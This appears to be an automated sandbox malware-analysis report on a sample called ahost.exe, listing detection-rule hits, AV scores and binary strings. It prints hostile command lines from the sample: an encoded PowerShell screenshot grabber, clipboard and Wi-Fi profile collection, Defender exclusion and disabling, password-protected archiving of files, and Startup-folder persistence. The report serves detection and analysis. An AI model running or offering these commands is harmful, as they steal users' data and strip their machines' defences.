AAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABF
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ahost.exe", ParentImage: C:\Users\user\Desktop\ahost.exe, ParentProcessId: 7328, ParentProcessName: ahost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7364, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ahost.exe", ParentImage: C:\Users\user\Desktop\ahost.exe, ParentProcessId: 7328, ParentProcessName: ahost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'", ProcessId: 7384, ProcessName: cmd.exe
              Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\ahost.exe, ProcessId: 7328, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\ahost.exe, ProcessId: 7328, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\ahost.exe, ProcessId: 7328, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7440, TargetFilename: C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.cmdline
              Source: Process startedAuthor: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6184, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *, ProcessId: 5800, ProcessName: rar.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7392, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 7600, ProcessName: powershell.exe
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8076, ProcessName: svchost.exe

              Data Obfuscation

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABF

              Stealing of Sensitive Information

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ahost.exe", ParentImage: C:\Users\user\Desktop\ahost.exe, ParentProcessId: 7328, ParentProcessName: ahost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7668, ProcessName: cmd.exe
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: ahost.exeReversingLabs: Detection: 36%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF89901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,104_2_00007FF7CF89901C
              Source: ahost.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: ahost.exe, 00000002.00000002.1877240019.00007FF8E7207000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: ahost.exe, 00000002.00000002.1875848363.00007FF8E6B6A000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: ahost.exe, 00000002.00000002.1877729374.00007FF8E72A5000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: ahost.exe, 00000000.00000003.1389281652.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1882674350.00007FF8F8324000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: ahost.exe, 00000002.00000002.1875848363.00007FF8E6AD2000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: ahost.exe, 00000000.00000003.1389281652.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1882674350.00007FF8F8324000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: ahost.exe, ahost.exe, 00000002.00000002.1878537582.00007FF8E7331000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: ahost.exe, ahost.exe, 00000002.00000002.1875848363.00007FF8E6B6A000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000068.00000000.1738525769.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmp, rar.exe, 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmp
